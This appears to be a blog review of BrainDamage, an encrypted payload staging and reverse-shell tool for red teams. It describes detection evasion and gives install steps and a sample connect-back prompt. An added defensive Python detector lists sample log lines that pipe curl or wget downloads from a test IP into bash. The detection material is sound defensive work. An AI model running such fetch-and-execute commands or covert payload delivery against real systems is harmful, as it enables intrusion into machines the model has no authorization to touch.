BrainDamage is a payload generation and encrypted staging tool designed for red teamers and adversary simulation teams. It provides the ability to craft shell scripts with embedded AES encryption. It serves them over a dedicated command-and-control interface, making it useful for early-stage payload deployment and post-exploitation pivoting.

While many payload generators exist, few offer the ease of use, encryption by default, and staging functionality packed into BrainDamage. It’s a cross-platform tool designed to support Linux, macOS, and Windows, and is especially relevant for scenarios where shellcode or payloads must be delivered covertly to compromised machines.
Features
- Encrypted Staging: Payloads are encrypted using AES before delivery, thereby mitigating basic static inspection.
- Payload Types: Supports bash reverse shells, Python payloads, and custom shellcode injection.
- Built-in HTTP/S Server: Hosts and serves payloads via a lightweight Flask-based interface.
- Session Tracking: Keeps track of staged payload execution and handler activity.
- Custom Encoding: Offers basic obfuscation to avoid string-based detections.
Installation and Usage
Clone the repo:
```
git clone https://github.com/mehulj94/BrainDamage.git
cd BrainDamage
pip install -r requirements.txt
```
To start the server and create a basic payload:
Interactive prompt example:
```
[+] Welcome to BrainDamage
[?] Choose payload type: [bash/python/shellcode]
[?] Enter IP to connect back: 192.168.1.10
[?] Enter port: 4444
[+] Payload created and encrypted at /payloads/bd_payload.sh
[+] Serving on http://0.0.0.0:8080
```
Red Team Relevance
BrainDamage fills a niche in red team operations where encrypted staging and lightweight reverse shell deployment are critical. Unlike heavier C2 platforms like Sliver, this tool doesn’t attempt to replicate a complete C2 infrastructure. Instead, it focuses on delivering an initial payload stealthily and efficiently.
For red teams operating in environments with basic monitoring or string-matching defences, the AES encryption of payloads and optional obfuscation make BrainDamage harder to flag during ingress.
Detection Considerations
While the tool encrypts payloads, execution methods like piping output to bash (`| bash`) remain a known red flag for EDR tools. Blue teams should monitor for outbound `curl`/`wget` behaviour to unexpected hosts and script execution patterns involving shell interpreters. Proxies or memory forensics tools, such as Rekall, can also help detect in-memory payload staging.
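The two signals named above (a `curl`/`wget` fetch from an unexpected host, and a download piped into a shell interpreter) can be checked over logged command lines. This is an added example, not code from BrainDamage or its author; the allowlist, the finding names and the sample log lines are assumptions constructed for illustration, and it covers only the pipe form of execution.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this environment legitimately fetches scripts from.
ALLOWED_HOSTS = {"mirror.corp.example"}
FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3"}
WRAPPERS = {"sudo", "env", "nohup"}
URL_RE = re.compile(r"https?://[^\s'\"|;]+")

def _basename(token):
    # "'/usr/bin/wget" -> "wget": drop quotes left over from sh -c '...'
    return token.strip("'\"").rsplit("/", 1)[-1]

def _command(stage):
    # First token that is not a wrapper or a VAR=value assignment.
    for token in stage:
        name = _basename(token)
        if name not in WRAPPERS and "=" not in name:
            return name
    return None

def analyze(cmdline):
    """Return findings for one logged command line (shell history, sh -c argument)."""
    findings = []
    stages = [s.split() for s in cmdline.split("|") if s.strip()]
    for i, stage in enumerate(stages):
        if not {_basename(t) for t in stage} & FETCHERS:
            continue
        for url in URL_RE.findall(" ".join(stage)):
            host = urlsplit(url).hostname
            if host and host not in ALLOWED_HOSTS:
                findings.append(f"unexpected-host:{host}")
        # Any later stage running an interpreter executes the download
        # straight from the pipe, with no file on disk to scan.
        if any(_command(later) in INTERPRETERS for later in stages[i + 1:]):
            findings.append("download-piped-to-interpreter")
    return findings

# Constructed sample command lines, not captured from a real host.
SAMPLE_LOG = [
    "curl -s http://203.0.113.7:8080/stage.sh | bash",
    "sh -c 'wget -qO- http://203.0.113.7:8080/stage.sh | sh'",
    "curl -fsSL https://mirror.corp.example/bootstrap.sh | sudo bash",
    "curl -s https://mirror.corp.example/health",
    "cat notes.txt | grep bash",
]

def triage(lines):
    # Keep only the lines that produced at least one finding.
    return {line: hits for line in lines if (hits := analyze(line))}
```

Because the check looks at the shape of the command line rather than the payload bytes, it still fires when the staged content is encrypted or obfuscated.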
Comparison
Compared to other payload staging tools:
Tool | Encryption | Platform Support | Staging Server | Use Case |
---|---|---|---|---|
BrainDamage | Yes (AES) | Windows/Linux/macOS | Built-in Flask | Encrypted payload delivery |
Unicorn | No | Windows | Manual | PowerShell/MSF payload generation |
Donut | No | Windows | None | Shellcode loader for .NET binaries |
SharpC2 | Yes | Windows | Custom | Advanced modular C2 framework |
Final Thoughts
BrainDamage isn’t trying to be the next Empire or Covenant. Its strength lies in its simplicity. For red teams needing a flexible, encrypted way to deliver payloads without raising obvious flags, it’s a worthy addition to the toolkit.
Pair it with reconnaissance tools like Argus or delivery tools like EvilReplay to build a modular, modern attack chain.
You can read more or download BrainDamage here: https://github.com/mehulj94/BrainDamage